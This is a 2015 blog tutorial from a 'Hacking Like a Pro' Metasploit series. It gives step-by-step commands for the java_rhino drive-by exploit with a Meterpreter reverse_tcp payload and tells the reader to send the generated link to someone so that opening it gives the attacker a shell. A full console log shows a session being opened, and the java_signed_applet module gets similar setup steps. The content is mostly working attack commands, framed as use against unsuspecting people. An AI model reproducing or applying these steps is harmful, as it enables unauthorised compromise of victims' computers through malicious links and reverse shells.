INTRODUCTION TO METASPLOIT PART-6 >> JAVA RHINO - HACKING LIKE A PRO

Saturday 2 May 2015

Java Rhino is also known as the infamous silent Java drive-by. At first it was an exploit you could only get by purchasing it, but later it was added to Metasploit as a free exploit. Its settings are similar to those of Aurora. Let's select java_rhino.
Code:
use exploit/multi/browser/java_rhino
Now set the payload:
Code:
set payload windows/meterpreter/reverse_tcp
Set LPORT, LHOST and SRVHOST. Remember that LHOST and SRVHOST should match.
Code:
set LHOST 192.168.2.103
set LPORT 4444
set SRVHOST 192.168.2.103

Also, changing URIPATH is not necessary, but I'll do it anyway.
Code:
set URIPATH /
Now type exploit and Metasploit will generate a link for you. Send that link to someone, and when they open it, they will be prompted to run Java, but not to run your file.

Example:
Code:
II    dTb.dTb  _.---._
  II  4'  v  'B   .'"".'/|`.""'.
  II  6.  .P  :  .' / |  `.  :
  II  'T;. .;P'  '.'  /  |    `.'
  II  'T; ;P'    `. /   |    .'
II  'YvP'  `-.__|__.-'

I love shells --egypt

  =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
  =[ svn r14663 updated today (2012.01.31)

msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(java_rhino) > set lport 4444
lport => 4444
msf  exploit(java_rhino) > set uripath /
uripath => /
msf  exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(java_rhino) > show options

Module options (exploit/multi/browser/java_rhino):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     192.168.2.103    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.2.103    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf  exploit(java_rhino) > set srvport 80
srvport => 80
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012

Java Signed Applet

Java signed applet is also one of my preferred browser exploits.

Open msfconsole and in it, type:
Code:
search signed

This will find the exploit that we want. Type:
Code:
use exploit/multi/browser/java_signed_applet

Now let's set the payload to Meterpreter.
Code:
set payload windows/meterpreter/reverse_tcp

Now simply set LHOST and URIPATH and you're done.
Code:
set LHOST 192.168.2.104
set URIPATH /
exploit
